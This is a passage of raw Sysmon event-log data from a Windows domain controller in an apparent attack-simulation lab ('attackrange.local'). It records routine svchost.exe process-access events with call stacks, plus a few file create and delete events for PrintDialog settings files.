12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.722{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.706{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\PrintDialog\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000005695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.706{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:18.706 23542300x80000000000000005694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.691{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.675{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 